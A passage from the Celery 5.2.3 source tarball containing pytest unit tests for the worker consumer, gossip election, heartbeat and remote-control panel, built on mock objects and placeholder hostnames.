c.timer.call_after.assert_called_with( 3.33, c._schedule_bucket_request, (bucket,), priority=c._limit_order, ) bucket.expected_time.assert_called_with(4) assert bucket.pop() == (request, 4) bucket.contents = deque() bucket.can_consume.reset_mock() c._schedule_bucket_request(bucket) bucket.can_consume.assert_not_called() def test_limit_task(self): c = self.get_consumer() bucket = Mock() request = Mock() with patch( 'celery.worker.consumer.consumer.Consumer._schedule_bucket_request' ) as reserv: c._limit_task(request, bucket, 1) bucket.add.assert_called_with((request, 1)) 
reserv.assert_called_with(bucket) def test_post_eta(self): c = self.get_consumer() c.qos = Mock() bucket = Mock() request = Mock() with patch( 'celery.worker.consumer.consumer.Consumer._schedule_bucket_request' ) as reserv: c._limit_post_eta(request, bucket, 1) c.qos.decrement_eventually.assert_called_with() bucket.add.assert_called_with((request, 1)) reserv.assert_called_with(bucket) def test_start_blueprint_raises_EMFILE(self): c = self.get_consumer() exc = c.blueprint.start.side_effect = OSError() exc.errno = errno.EMFILE with pytest.raises(OSError): c.start() def test_max_restarts_exceeded(self): c = self.get_consumer() def se(*args, **kwargs): c.blueprint.state = CLOSE raise RestartFreqExceeded() c._restart_state.step.side_effect = se c.blueprint.start.side_effect = socket.error() with patch('celery.worker.consumer.consumer.sleep') as sleep: c.start() sleep.assert_called_with(1) def test_do_not_restart_when_closed(self): c = self.get_consumer() c.blueprint.state = None def bp_start(*args, **kwargs): c.blueprint.state = CLOSE c.blueprint.start.side_effect = bp_start with patch('celery.worker.consumer.consumer.sleep'): c.start() c.blueprint.start.assert_called_once_with(c) def test_do_not_restart_when_terminated(self): c = self.get_consumer() c.blueprint.state = None def bp_start(*args, **kwargs): c.blueprint.state = TERMINATE c.blueprint.start.side_effect = bp_start with patch('celery.worker.consumer.consumer.sleep'): c.start() c.blueprint.start.assert_called_once_with(c) def test_no_retry_raises_error(self): self.app.conf.broker_connection_retry = False c = self.get_consumer() c.blueprint.start.side_effect = socket.error() with pytest.raises(socket.error): c.start() def _closer(self, c): def se(*args, **kwargs): c.blueprint.state = CLOSE return se def test_collects_at_restart(self): c = self.get_consumer() c.connection.collect.side_effect = MemoryError() c.blueprint.start.side_effect = socket.error() c.blueprint.restart.side_effect = self._closer(c) c.start() c.connection.collect.assert_called_with() def test_register_with_event_loop(self): c = self.get_consumer() c.register_with_event_loop(Mock(name='loop')) def test_on_close_clears_semaphore_timer_and_reqs(self): with patch('celery.worker.consumer.consumer.reserved_requests') as res: c = self.get_consumer() c.on_close() c.controller.semaphore.clear.assert_called_with() c.timer.clear.assert_called_with() res.clear.assert_called_with() c.pool.flush.assert_called_with() c.controller = None c.timer = None c.pool = None c.on_close() def test_connect_error_handler(self): self.app._connection = _amqp_connection() conn = self.app._connection.return_value c = self.get_consumer() assert c.connect() conn.ensure_connection.assert_called() errback = conn.ensure_connection.call_args[0][0] errback(Mock(), 0) @patch('celery.worker.consumer.consumer.error') def test_connect_error_handler_progress(self, error): self.app.conf.broker_connection_retry = True self.app.conf.broker_connection_max_retries = 3 self.app._connection = _amqp_connection() conn = self.app._connection.return_value c = self.get_consumer() assert c.connect() errback = conn.ensure_connection.call_args[0][0] errback(Mock(), 2) assert error.call_args[0][3] == 'Trying again in 2.00 seconds... (1/3)' errback(Mock(), 4) assert error.call_args[0][3] == 'Trying again in 4.00 seconds... (2/3)' errback(Mock(), 6) assert error.call_args[0][3] == 'Trying again in 6.00 seconds... 
(3/3)' def test_cancel_long_running_tasks_on_connection_loss(self): c = self.get_consumer() c.app.conf.worker_cancel_long_running_tasks_on_connection_loss = True mock_request_acks_late_not_acknowledged = Mock() mock_request_acks_late_not_acknowledged.task.acks_late = True mock_request_acks_late_not_acknowledged.acknowledged = False mock_request_acks_late_acknowledged = Mock() mock_request_acks_late_acknowledged.task.acks_late = True mock_request_acks_late_acknowledged.acknowledged = True mock_request_acks_early = Mock() mock_request_acks_early.task.acks_late = False mock_request_acks_early.acknowledged = False active_requests.add(mock_request_acks_late_not_acknowledged) active_requests.add(mock_request_acks_late_acknowledged) active_requests.add(mock_request_acks_early) c.on_connection_error_after_connected(Mock()) mock_request_acks_late_not_acknowledged.cancel.assert_called_once_with(c.pool) mock_request_acks_late_acknowledged.cancel.assert_not_called() mock_request_acks_early.cancel.assert_not_called() active_requests.clear() def test_cancel_long_running_tasks_on_connection_loss__warning(self): c = self.get_consumer() c.app.conf.worker_cancel_long_running_tasks_on_connection_loss = False with pytest.deprecated_call(match=CANCEL_TASKS_BY_DEFAULT): c.on_connection_error_after_connected(Mock()) class test_Heart: def test_start(self): c = Mock() c.timer = Mock() c.event_dispatcher = Mock() with patch('celery.worker.heartbeat.Heart') as hcls: h = Heart(c) assert h.enabled assert h.heartbeat_interval is None assert c.heart is None h.start(c) assert c.heart hcls.assert_called_with(c.timer, c.event_dispatcher, h.heartbeat_interval) c.heart.start.assert_called_with() def test_start_heartbeat_interval(self): c = Mock() c.timer = Mock() c.event_dispatcher = Mock() with patch('celery.worker.heartbeat.Heart') as hcls: h = Heart(c, False, 20) assert h.enabled assert h.heartbeat_interval == 20 assert c.heart is None h.start(c) assert c.heart hcls.assert_called_with(c.timer, c.event_dispatcher, h.heartbeat_interval) c.heart.start.assert_called_with() class test_Tasks: def test_stop(self): c = Mock() tasks = Tasks(c) assert c.task_consumer is None assert c.qos is None c.task_consumer = Mock() tasks.stop(c) def test_stop_already_stopped(self): c = Mock() tasks = Tasks(c) tasks.stop(c) class test_Agent: def test_start(self): c = Mock() agent = Agent(c) agent.instantiate = Mock() agent.agent_cls = 'foo:Agent' assert agent.create(c) is not None agent.instantiate.assert_called_with(agent.agent_cls, c.connection) class test_Mingle: def test_start_no_replies(self): c = Mock() c.app.connection_for_read = _amqp_connection() mingle = Mingle(c) I = c.app.control.inspect.return_value = Mock() I.hello.return_value = {} mingle.start(c) def test_start(self): c = Mock() c.app.connection_for_read = _amqp_connection() mingle = Mingle(c) assert mingle.enabled Aig = LimitedSet() Big = LimitedSet() Aig.add('Aig-1') Aig.add('Aig-2') Big.add('Big-1') I = c.app.control.inspect.return_value = Mock() I.hello.return_value = { 'A@example.com': { 'clock': 312, 'revoked': Aig._data, }, 'B@example.com': { 'clock': 29, 'revoked': Big._data, }, 'C@example.com': { 'error': 'unknown method', }, } our_revoked = c.controller.state.revoked = LimitedSet() mingle.start(c) I.hello.assert_called_with(c.hostname, our_revoked._data) c.app.clock.adjust.assert_has_calls([ call(312), call(29), ], any_order=True) assert 'Aig-1' in our_revoked assert 'Aig-2' in our_revoked assert 'Big-1' in our_revoked def _amqp_connection(): connection = 
ContextMock(name='Connection') connection.return_value = ContextMock(name='connection') connection.return_value.transport.driver_type = 'amqp' return connection class test_Gossip: def test_init(self): c = self.Consumer() c.app.connection_for_read = _amqp_connection() g = Gossip(c) assert g.enabled assert c.gossip is g def test_callbacks(self): c = self.Consumer() c.app.connection_for_read = _amqp_connection() g = Gossip(c) on_node_join = Mock(name='on_node_join') on_node_join2 = Mock(name='on_node_join2') on_node_leave = Mock(name='on_node_leave') on_node_lost = Mock(name='on.node_lost') g.on.node_join.add(on_node_join) g.on.node_join.add(on_node_join2) g.on.node_leave.add(on_node_leave) g.on.node_lost.add(on_node_lost) worker = Mock(name='worker') g.on_node_join(worker) on_node_join.assert_called_with(worker) on_node_join2.assert_called_with(worker) g.on_node_leave(worker) on_node_leave.assert_called_with(worker) g.on_node_lost(worker) on_node_lost.assert_called_with(worker) def test_election(self): c = self.Consumer() c.app.connection_for_read = _amqp_connection() g = Gossip(c) g.start(c) g.election('id', 'topic', 'action') assert g.consensus_replies['id'] == [] g.dispatcher.send.assert_called_with( 'worker-elect', id='id', topic='topic', cver=1, action='action', ) def test_call_task(self): c = self.Consumer() c.app.connection_for_read = _amqp_connection() g = Gossip(c) g.start(c) signature = g.app.signature = Mock(name='app.signature') task = Mock() g.call_task(task) signature.assert_called_with(task) signature.return_value.apply_async.assert_called_with() signature.return_value.apply_async.side_effect = MemoryError() with patch('celery.worker.consumer.gossip.logger') as logger: g.call_task(task) logger.exception.assert_called() def Event(self, id='id', clock=312, hostname='foo@example.com', pid=4312, topic='topic', action='action', cver=1): return { 'id': id, 'clock': clock, 'hostname': hostname, 'pid': pid, 'topic': topic, 'action': action, 'cver': cver, } def test_on_elect(self): c = self.Consumer() c.app.connection_for_read = _amqp_connection() g = Gossip(c) g.start(c) event = self.Event('id1') g.on_elect(event) in_heap = g.consensus_requests['id1'] assert in_heap g.dispatcher.send.assert_called_with('worker-elect-ack', id='id1') event.pop('clock') with patch('celery.worker.consumer.gossip.logger') as logger: g.on_elect(event) logger.exception.assert_called() def Consumer(self, hostname='foo@x.com', pid=4312): c = Mock() c.app.connection = _amqp_connection() c.hostname = hostname c.pid = pid return c def setup_election(self, g, c): g.start(c) g.clock = self.app.clock assert 'idx' not in g.consensus_replies assert g.on_elect_ack({'id': 'idx'}) is None g.state.alive_workers.return_value = [ 'foo@x.com', 'bar@x.com', 'baz@x.com', ] g.consensus_replies['id1'] = [] g.consensus_requests['id1'] = [] e1 = self.Event('id1', 1, 'foo@x.com') e2 = self.Event('id1', 2, 'bar@x.com') e3 = self.Event('id1', 3, 'baz@x.com') g.on_elect(e1) g.on_elect(e2) g.on_elect(e3) assert len(g.consensus_requests['id1']) == 3 with patch('celery.worker.consumer.gossip.info'): g.on_elect_ack(e1) assert len(g.consensus_replies['id1']) == 1 g.on_elect_ack(e2) assert len(g.consensus_replies['id1']) == 2 g.on_elect_ack(e3) with pytest.raises(KeyError): g.consensus_replies['id1'] def test_on_elect_ack_win(self): c = self.Consumer(hostname='foo@x.com') # I will win c.app.connection_for_read = _amqp_connection() g = Gossip(c) handler = g.election_handlers['topic'] = Mock() self.setup_election(g, c) 
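# Illustrative note (editorial): setup_election() above replays a
# 'worker-elect' round between three workers.  Judging by these assertions,
# once replies from every alive worker have arrived they are ordered by
# (clock, hostname) and the first entry wins, so 'foo@x.com' (clock 1) is
# elected here and its handler for the topic is invoked with the requested
# action, while 'bar@x.com' (clock 2) loses in the following test.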
handler.assert_called_with('action') def test_on_elect_ack_lose(self): c = self.Consumer(hostname='bar@x.com') # I will lose c.app.connection_for_read = _amqp_connection() g = Gossip(c) handler = g.election_handlers['topic'] = Mock() self.setup_election(g, c) handler.assert_not_called() def test_on_elect_ack_win_but_no_action(self): c = self.Consumer(hostname='foo@x.com') # I will win c.app.connection_for_read = _amqp_connection() g = Gossip(c) g.election_handlers = {} with patch('celery.worker.consumer.gossip.logger') as logger: self.setup_election(g, c) logger.exception.assert_called() def test_on_node_join(self): c = self.Consumer() c.app.connection_for_read = _amqp_connection() g = Gossip(c) with patch('celery.worker.consumer.gossip.debug') as debug: g.on_node_join(c) debug.assert_called_with('%s joined the party', 'foo@x.com') def test_on_node_leave(self): c = self.Consumer() c.app.connection_for_read = _amqp_connection() g = Gossip(c) with patch('celery.worker.consumer.gossip.debug') as debug: g.on_node_leave(c) debug.assert_called_with('%s left', 'foo@x.com') def test_on_node_lost(self): c = self.Consumer() c.app.connection_for_read = _amqp_connection() g = Gossip(c) with patch('celery.worker.consumer.gossip.info') as info: g.on_node_lost(c) info.assert_called_with('missed heartbeat from %s', 'foo@x.com') def test_register_timer(self): c = self.Consumer() c.app.connection_for_read = _amqp_connection() g = Gossip(c) g.register_timer() c.timer.call_repeatedly.assert_called_with(g.interval, g.periodic) tref = g._tref g.register_timer() tref.cancel.assert_called_with() def test_periodic(self): c = self.Consumer() c.app.connection_for_read = _amqp_connection() g = Gossip(c) g.on_node_lost = Mock() state = g.state = Mock() worker = Mock() state.workers = {'foo': worker} worker.alive = True worker.hostname = 'foo' g.periodic() worker.alive = False g.periodic() g.on_node_lost.assert_called_with(worker) with pytest.raises(KeyError): state.workers['foo'] def test_on_message__task(self): c = self.Consumer() c.app.connection_for_read = _amqp_connection() g = Gossip(c) assert g.enabled message = Mock(name='message') message.delivery_info = {'routing_key': 'task.failed'} g.on_message(Mock(name='prepare'), message) def test_on_message(self): c = self.Consumer() c.app.connection_for_read = _amqp_connection() g = Gossip(c) assert g.enabled prepare = Mock() prepare.return_value = 'worker-online', {} c.app.events.State.assert_called_with( on_node_join=g.on_node_join, on_node_leave=g.on_node_leave, max_tasks_in_memory=1, ) g.update_state = Mock() worker = Mock() g.on_node_join = Mock() g.on_node_leave = Mock() g.update_state.return_value = worker, 1 message = Mock() message.delivery_info = {'routing_key': 'worker-online'} message.headers = {'hostname': 'other'} handler = g.event_handlers['worker-online'] = Mock() g.on_message(prepare, message) handler.assert_called_with(message.payload) g.event_handlers = {} g.on_message(prepare, message) message.delivery_info = {'routing_key': 'worker-offline'} prepare.return_value = 'worker-offline', {} g.on_message(prepare, message) message.delivery_info = {'routing_key': 'worker-baz'} prepare.return_value = 'worker-baz', {} g.update_state.return_value = worker, 0 g.on_message(prepare, message) message.headers = {'hostname': g.hostname} g.on_message(prepare, message) g.clock.forward.assert_called_with() ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 
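# ---------------------------------------------------------------------------
# Illustrative sketch (editorial, not shipped with Celery): the Gossip tests
# above drive an event-dispatch pattern in which each incoming broadcast
# message is routed to a handler keyed by its routing key, task events are
# ignored, and events originating from the local node only advance the
# logical clock.  A minimal standalone version of that pattern, using
# hypothetical names, could look like this:

def dispatch_gossip_message(message, handlers, hostname, clock):
    """Route one gossip-style message to its handler, skipping task events."""
    routing_key = message['delivery_info']['routing_key']
    if routing_key.startswith('task.'):
        return  # task events are not gossip events
    if message['headers'].get('hostname') == hostname:
        clock.append('forwarded')  # stand-in for clock.forward()
        return
    handler = handlers.get(routing_key)
    if handler is not None:
        handler(message['payload'])


if __name__ == '__main__':  # tiny usage example
    seen = []
    dispatch_gossip_message(
        {'delivery_info': {'routing_key': 'worker-online'},
         'headers': {'hostname': 'other@example.com'},
         'payload': {'hostname': 'other@example.com'}},
        handlers={'worker-online': seen.append},
        hostname='me@example.com',
        clock=[],
    )
    assert seen  # the worker-online handler received the payload
# ---------------------------------------------------------------------------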
celery-5.2.3/t/unit/worker/test_control.py0000664000175000017500000005772600000000000020542 0ustar00asifasif00000000000000import socket import sys import time from collections import defaultdict from datetime import datetime, timedelta from queue import Queue as FastQueue from unittest.mock import Mock, call, patch import pytest from kombu import pidbox from kombu.utils.uuid import uuid from celery.utils.collections import AttributeDict from celery.utils.timer2 import Timer from celery.worker import WorkController as _WC from celery.worker import consumer, control from celery.worker import state as worker_state from celery.worker.pidbox import Pidbox, gPidbox from celery.worker.request import Request from celery.worker.state import REVOKE_EXPIRES, revoked hostname = socket.gethostname() class WorkController: autoscaler = None def stats(self): return {'total': worker_state.total_count} class Consumer(consumer.Consumer): def __init__(self, app): self.app = app self.buffer = FastQueue() self.timer = Timer() self.event_dispatcher = Mock() self.controller = WorkController() self.task_consumer = Mock() self.prefetch_multiplier = 1 self.initial_prefetch_count = 1 from celery.concurrency.base import BasePool self.pool = BasePool(10) self.task_buckets = defaultdict(lambda: None) self.hub = None def call_soon(self, p, *args, **kwargs): return p(*args, **kwargs) class test_Pidbox: def test_shutdown(self): with patch('celery.worker.pidbox.ignore_errors') as eig: parent = Mock() pbox = Pidbox(parent) pbox._close_channel = Mock() assert pbox.c is parent pconsumer = pbox.consumer = Mock() cancel = pconsumer.cancel pbox.shutdown(parent) eig.assert_called_with(parent, cancel) pbox._close_channel.assert_called_with(parent) class test_Pidbox_green: def test_stop(self): parent = Mock() g = gPidbox(parent) stopped = g._node_stopped = Mock() shutdown = g._node_shutdown = Mock() close_chan = g._close_channel = Mock() g.stop(parent) shutdown.set.assert_called_with() stopped.wait.assert_called_with() close_chan.assert_called_with(parent) assert g._node_stopped is None assert g._node_shutdown is None close_chan.reset() g.stop(parent) close_chan.assert_called_with(parent) def test_resets(self): parent = Mock() g = gPidbox(parent) g._resets = 100 g.reset() assert g._resets == 101 def test_loop(self): parent = Mock() conn = self.app.connection_for_read() parent.connection_for_read.return_value = conn drain = conn.drain_events = Mock() g = gPidbox(parent) parent.connection = Mock() do_reset = g._do_reset = Mock() call_count = [0] def se(*args, **kwargs): if call_count[0] > 2: g._node_shutdown.set() g.reset() call_count[0] += 1 drain.side_effect = se g.loop(parent) assert do_reset.call_count == 4 class test_ControlPanel: def setup(self): self.panel = self.create_panel(consumer=Consumer(self.app)) @self.app.task(name='c.unittest.mytask', rate_limit=200, shared=False) def mytask(): pass self.mytask = mytask def create_state(self, **kwargs): kwargs.setdefault('app', self.app) kwargs.setdefault('hostname', hostname) kwargs.setdefault('tset', set) return AttributeDict(kwargs) def create_panel(self, **kwargs): return self.app.control.mailbox.Node( hostname=hostname, state=self.create_state(**kwargs), handlers=control.Panel.data, ) def test_enable_events(self): consumer = Consumer(self.app) panel = self.create_panel(consumer=consumer) evd = consumer.event_dispatcher evd.groups = set() panel.handle('enable_events') assert not evd.groups evd.groups = {'worker'} panel.handle('enable_events') assert 'task' in evd.groups evd.groups 
= {'task'} assert 'already enabled' in panel.handle('enable_events')['ok'] def test_disable_events(self): consumer = Consumer(self.app) panel = self.create_panel(consumer=consumer) evd = consumer.event_dispatcher evd.enabled = True evd.groups = {'task'} panel.handle('disable_events') assert 'task' not in evd.groups assert 'already disabled' in panel.handle('disable_events')['ok'] def test_clock(self): consumer = Consumer(self.app) panel = self.create_panel(consumer=consumer) panel.state.app.clock.value = 313 x = panel.handle('clock') assert x['clock'] == 313 def test_hello(self): consumer = Consumer(self.app) panel = self.create_panel(consumer=consumer) panel.state.app.clock.value = 313 panel.state.hostname = 'elaine@vandelay.com' worker_state.revoked.add('revoked1') try: assert panel.handle('hello', { 'from_node': 'elaine@vandelay.com', }) is None x = panel.handle('hello', { 'from_node': 'george@vandelay.com', }) assert x['clock'] == 314 # incremented x = panel.handle('hello', { 'from_node': 'george@vandelay.com', 'revoked': {'1234', '4567', '891'} }) assert 'revoked1' in x['revoked'] assert '1234' in x['revoked'] assert '4567' in x['revoked'] assert '891' in x['revoked'] assert x['clock'] == 315 # incremented finally: worker_state.revoked.discard('revoked1') def test_hello_does_not_send_expired_revoked_items(self): consumer = Consumer(self.app) panel = self.create_panel(consumer=consumer) panel.state.app.clock.value = 313 panel.state.hostname = 'elaine@vandelay.com' # Add an expired revoked item to the revoked set. worker_state.revoked.add( 'expired_in_past', now=time.monotonic() - REVOKE_EXPIRES - 1 ) x = panel.handle('hello', { 'from_node': 'george@vandelay.com', 'revoked': {'1234', '4567', '891'} }) assert 'expired_in_past' not in x['revoked'] def test_conf(self): consumer = Consumer(self.app) panel = self.create_panel(consumer=consumer) panel.app = self.app panel.app.finalize() self.app.conf.some_key6 = 'hello world' x = panel.handle('dump_conf') assert 'some_key6' in x def test_election(self): consumer = Consumer(self.app) panel = self.create_panel(consumer=consumer) consumer.gossip = Mock() panel.handle( 'election', {'id': 'id', 'topic': 'topic', 'action': 'action'}, ) consumer.gossip.election.assert_called_with('id', 'topic', 'action') def test_election__no_gossip(self): consumer = Mock(name='consumer') consumer.gossip = None panel = self.create_panel(consumer=consumer) panel.handle( 'election', {'id': 'id', 'topic': 'topic', 'action': 'action'}, ) def test_heartbeat(self): consumer = Consumer(self.app) panel = self.create_panel(consumer=consumer) event_dispatcher = consumer.event_dispatcher event_dispatcher.enabled = True panel.handle('heartbeat') assert ('worker-heartbeat',) in event_dispatcher.send.call_args def test_time_limit(self): panel = self.create_panel(consumer=Mock()) r = panel.handle('time_limit', arguments={ 'task_name': self.mytask.name, 'hard': 30, 'soft': 10}) assert self.mytask.time_limit == 30 assert self.mytask.soft_time_limit == 10 assert 'ok' in r r = panel.handle('time_limit', arguments={ 'task_name': self.mytask.name, 'hard': None, 'soft': None}) assert self.mytask.time_limit is None assert self.mytask.soft_time_limit is None assert 'ok' in r r = panel.handle('time_limit', arguments={ 'task_name': '248e8afya9s8dh921eh928', 'hard': 30}) assert 'error' in r def test_active_queues(self): import kombu x = kombu.Consumer(self.app.connection_for_read(), [kombu.Queue('foo', kombu.Exchange('foo'), 'foo'), kombu.Queue('bar', kombu.Exchange('bar'), 'bar')], 
auto_declare=False) consumer = Mock() consumer.task_consumer = x panel = self.create_panel(consumer=consumer) r = panel.handle('active_queues') assert list(sorted(q['name'] for q in r)) == ['bar', 'foo'] def test_active_queues__empty(self): consumer = Mock(name='consumer') panel = self.create_panel(consumer=consumer) consumer.task_consumer = None assert not panel.handle('active_queues') def test_dump_tasks(self): info = '\n'.join(self.panel.handle('dump_tasks')) assert 'mytask' in info assert 'rate_limit=200' in info def test_dump_tasks2(self): prev, control.DEFAULT_TASK_INFO_ITEMS = ( control.DEFAULT_TASK_INFO_ITEMS, []) try: info = '\n'.join(self.panel.handle('dump_tasks')) assert 'mytask' in info assert 'rate_limit=200' not in info finally: control.DEFAULT_TASK_INFO_ITEMS = prev def test_stats(self): prev_count, worker_state.total_count = worker_state.total_count, 100 try: assert self.panel.handle('stats')['total'] == 100 finally: worker_state.total_count = prev_count def test_report(self): self.panel.handle('report') def test_active(self): r = Request( self.TaskMessage(self.mytask.name, 'do re mi'), app=self.app, ) worker_state.active_requests.add(r) try: assert self.panel.handle('dump_active') finally: worker_state.active_requests.discard(r) def test_active_safe(self): kwargsrepr = '' r = Request( self.TaskMessage(self.mytask.name, id='do re mi', kwargsrepr=kwargsrepr), app=self.app, ) worker_state.active_requests.add(r) try: active_resp = self.panel.handle('dump_active', {'safe': True}) assert active_resp[0]['kwargs'] == kwargsrepr finally: worker_state.active_requests.discard(r) def test_pool_grow(self): class MockPool: def __init__(self, size=1): self.size = size def grow(self, n=1): self.size += n def shrink(self, n=1): self.size -= n @property def num_processes(self): return self.size consumer = Consumer(self.app) consumer.prefetch_multiplier = 8 consumer.qos = Mock(name='qos') consumer.pool = MockPool(1) panel = self.create_panel(consumer=consumer) panel.handle('pool_grow') assert consumer.pool.size == 2 consumer.qos.increment_eventually.assert_called_with(8) assert consumer.initial_prefetch_count == 16 panel.handle('pool_shrink') assert consumer.pool.size == 1 consumer.qos.decrement_eventually.assert_called_with(8) assert consumer.initial_prefetch_count == 8 panel.state.consumer = Mock() panel.state.consumer.controller = Mock() r = panel.handle('pool_grow') assert 'error' in r r = panel.handle('pool_shrink') assert 'error' in r def test_add__cancel_consumer(self): class MockConsumer: queues = [] canceled = [] consuming = False hub = Mock(name='hub') def add_queue(self, queue): self.queues.append(queue.name) def consume(self): self.consuming = True def cancel_by_queue(self, queue): self.canceled.append(queue) def consuming_from(self, queue): return queue in self.queues consumer = Consumer(self.app) consumer.task_consumer = MockConsumer() panel = self.create_panel(consumer=consumer) panel.handle('add_consumer', {'queue': 'MyQueue'}) assert 'MyQueue' in consumer.task_consumer.queues assert consumer.task_consumer.consuming panel.handle('add_consumer', {'queue': 'MyQueue'}) panel.handle('cancel_consumer', {'queue': 'MyQueue'}) assert 'MyQueue' in consumer.task_consumer.canceled def test_revoked(self): worker_state.revoked.clear() worker_state.revoked.add('a1') worker_state.revoked.add('a2') try: assert sorted(self.panel.handle('dump_revoked')) == ['a1', 'a2'] finally: worker_state.revoked.clear() def test_dump_schedule(self): consumer = Consumer(self.app) panel = 
self.create_panel(consumer=consumer) assert not panel.handle('dump_schedule') r = Request( self.TaskMessage(self.mytask.name, 'CAFEBABE'), app=self.app, ) consumer.timer.schedule.enter_at( consumer.timer.Entry(lambda x: x, (r,)), datetime.now() + timedelta(seconds=10)) consumer.timer.schedule.enter_at( consumer.timer.Entry(lambda x: x, (object(),)), datetime.now() + timedelta(seconds=10)) assert panel.handle('dump_schedule') def test_dump_reserved(self): consumer = Consumer(self.app) req = Request( self.TaskMessage(self.mytask.name, args=(2, 2)), app=self.app, ) # ^ need to keep reference for reserved_tasks WeakSet. worker_state.task_reserved(req) try: panel = self.create_panel(consumer=consumer) response = panel.handle('dump_reserved', {'safe': True}) assert response[0]['name'] == self.mytask.name assert response[0]['hostname'] == socket.gethostname() worker_state.reserved_requests.clear() assert not panel.handle('dump_reserved') finally: worker_state.reserved_requests.clear() def test_rate_limit_invalid_rate_limit_string(self): e = self.panel.handle('rate_limit', arguments={ 'task_name': 'tasks.add', 'rate_limit': 'x1240301#%!'}) assert 'Invalid rate limit string' in e.get('error') def test_rate_limit(self): class xConsumer: reset = False def reset_rate_limits(self): self.reset = True consumer = xConsumer() panel = self.create_panel(app=self.app, consumer=consumer) task = self.app.tasks[self.mytask.name] panel.handle('rate_limit', arguments={'task_name': task.name, 'rate_limit': '100/m'}) assert task.rate_limit == '100/m' assert consumer.reset consumer.reset = False panel.handle('rate_limit', arguments={ 'task_name': task.name, 'rate_limit': 0, }) assert task.rate_limit == 0 assert consumer.reset def test_rate_limit_nonexistant_task(self): self.panel.handle('rate_limit', arguments={ 'task_name': 'xxxx.does.not.exist', 'rate_limit': '1000/s'}) def test_unexposed_command(self): with pytest.raises(KeyError): self.panel.handle('foo', arguments={}) def test_revoke_with_name(self): tid = uuid() m = { 'method': 'revoke', 'destination': hostname, 'arguments': { 'task_id': tid, 'task_name': self.mytask.name, }, } self.panel.handle_message(m, None) assert tid in revoked def test_revoke_with_name_not_in_registry(self): tid = uuid() m = { 'method': 'revoke', 'destination': hostname, 'arguments': { 'task_id': tid, 'task_name': 'xxxxxxxxx33333333388888', }, } self.panel.handle_message(m, None) assert tid in revoked def test_revoke(self): tid = uuid() m = { 'method': 'revoke', 'destination': hostname, 'arguments': { 'task_id': tid, }, } self.panel.handle_message(m, None) assert tid in revoked m = { 'method': 'revoke', 'destination': 'does.not.exist', 'arguments': { 'task_id': tid + 'xxx', }, } self.panel.handle_message(m, None) assert tid + 'xxx' not in revoked def test_revoke_terminate(self): request = Mock() request.id = tid = uuid() state = self.create_state() state.consumer = Mock() worker_state.task_reserved(request) try: r = control.revoke(state, tid, terminate=True) assert tid in revoked assert request.terminate.call_count assert 'terminate:' in r['ok'] # unknown task id only revokes r = control.revoke(state, uuid(), terminate=True) assert 'tasks unknown' in r['ok'] finally: worker_state.task_ready(request) def test_autoscale(self): self.panel.state.consumer = Mock() self.panel.state.consumer.controller = Mock() sc = self.panel.state.consumer.controller.autoscaler = Mock() sc.update.return_value = 10, 2 m = {'method': 'autoscale', 'destination': hostname, 'arguments': {'max': '10', 'min': '2'}} 
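# Illustrative note (editorial): remote-control requests handled by
# handle_message() are plain dicts in the pidbox format used throughout this
# module -- a 'method' naming the registered handler, an optional
# 'destination' (the target hostname), and an 'arguments' mapping passed on
# to the handler, e.g.:
#
#   {'method': 'ping', 'destination': hostname}
#   {'method': 'autoscale', 'destination': hostname,
#    'arguments': {'max': '10', 'min': '2'}}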
r = self.panel.handle_message(m, None) assert 'ok' in r self.panel.state.consumer.controller.autoscaler = None r = self.panel.handle_message(m, None) assert 'error' in r def test_ping(self): m = {'method': 'ping', 'destination': hostname} r = self.panel.handle_message(m, None) assert r == {'ok': 'pong'} def test_shutdown(self): m = {'method': 'shutdown', 'destination': hostname} with pytest.raises(SystemExit): self.panel.handle_message(m, None) def test_panel_reply(self): replies = [] class _Node(pidbox.Node): def reply(self, data, exchange, routing_key, **kwargs): replies.append(data) panel = _Node( hostname=hostname, state=self.create_state(consumer=Consumer(self.app)), handlers=control.Panel.data, mailbox=self.app.control.mailbox, ) r = panel.dispatch('ping', reply_to={ 'exchange': 'x', 'routing_key': 'x', }) assert r == {'ok': 'pong'} assert replies[0] == {panel.hostname: {'ok': 'pong'}} def test_pool_restart(self): consumer = Consumer(self.app) consumer.controller = _WC(app=self.app) consumer.controller.consumer = consumer consumer.controller.pool.restart = Mock() consumer.reset_rate_limits = Mock(name='reset_rate_limits()') consumer.update_strategies = Mock(name='update_strategies()') consumer.event_dispatcher = Mock(name='evd') panel = self.create_panel(consumer=consumer) assert panel.state.consumer.controller.consumer is consumer panel.app = self.app _import = panel.app.loader.import_from_cwd = Mock() _reload = Mock() with pytest.raises(ValueError): panel.handle('pool_restart', {'reloader': _reload}) self.app.conf.worker_pool_restarts = True panel.handle('pool_restart', {'reloader': _reload}) consumer.controller.pool.restart.assert_called() consumer.reset_rate_limits.assert_called_with() consumer.update_strategies.assert_called_with() _reload.assert_not_called() _import.assert_not_called() consumer.controller.pool.restart.side_effect = NotImplementedError() panel.handle('pool_restart', {'reloader': _reload}) consumer.controller.consumer = None panel.handle('pool_restart', {'reloader': _reload}) @patch('celery.worker.worker.logger.debug') def test_pool_restart_import_modules(self, _debug): consumer = Consumer(self.app) consumer.controller = _WC(app=self.app) consumer.controller.consumer = consumer consumer.controller.pool.restart = Mock() consumer.reset_rate_limits = Mock(name='reset_rate_limits()') consumer.update_strategies = Mock(name='update_strategies()') panel = self.create_panel(consumer=consumer) panel.app = self.app assert panel.state.consumer.controller.consumer is consumer _import = consumer.controller.app.loader.import_from_cwd = Mock() _reload = Mock() self.app.conf.worker_pool_restarts = True with patch('sys.modules'): panel.handle('pool_restart', { 'modules': ['foo', 'bar'], 'reloader': _reload, }) consumer.controller.pool.restart.assert_called() consumer.reset_rate_limits.assert_called_with() consumer.update_strategies.assert_called_with() _reload.assert_not_called() _import.assert_has_calls([call('bar'), call('foo')], any_order=True) assert _import.call_count == 2 def test_pool_restart_reload_modules(self): consumer = Consumer(self.app) consumer.controller = _WC(app=self.app) consumer.controller.consumer = consumer consumer.controller.pool.restart = Mock() consumer.reset_rate_limits = Mock(name='reset_rate_limits()') consumer.update_strategies = Mock(name='update_strategies()') panel = self.create_panel(consumer=consumer) panel.app = self.app _import = panel.app.loader.import_from_cwd = Mock() _reload = Mock() self.app.conf.worker_pool_restarts = True with 
